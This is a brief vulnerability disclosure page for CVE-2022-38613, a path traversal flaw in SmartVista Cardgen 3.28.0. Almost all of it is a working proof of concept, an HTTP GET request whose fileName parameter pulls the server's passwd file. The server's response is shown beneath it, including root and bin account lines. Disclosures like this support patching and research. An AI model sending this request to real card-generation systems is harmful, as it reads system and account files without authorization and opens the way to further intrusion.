Path traversal in SmartVista Cardgen version 3.28.0 (CVE-2022-38613)
CVE-2022-38613
GET /svcl/download?serviceType=temp&directory=temp&fileName=passwd&institutionId=0 HTTP/1.1
Host: URL
Cookie: JSESSIONID=[...TRUNCATED...]HTTP/1.1 200 OK
Connection: close
Content-Length: 2361
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="passwd"
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
[...TRUNCATED...]PreviousReflected XSS in SmartVista Cardgen version 3.28.0 (CVE-2022-35554)NextList all files in arbitrary folder in SmartVista Cardgen version 3.28.0 (CVE-2022-38614)
Last updated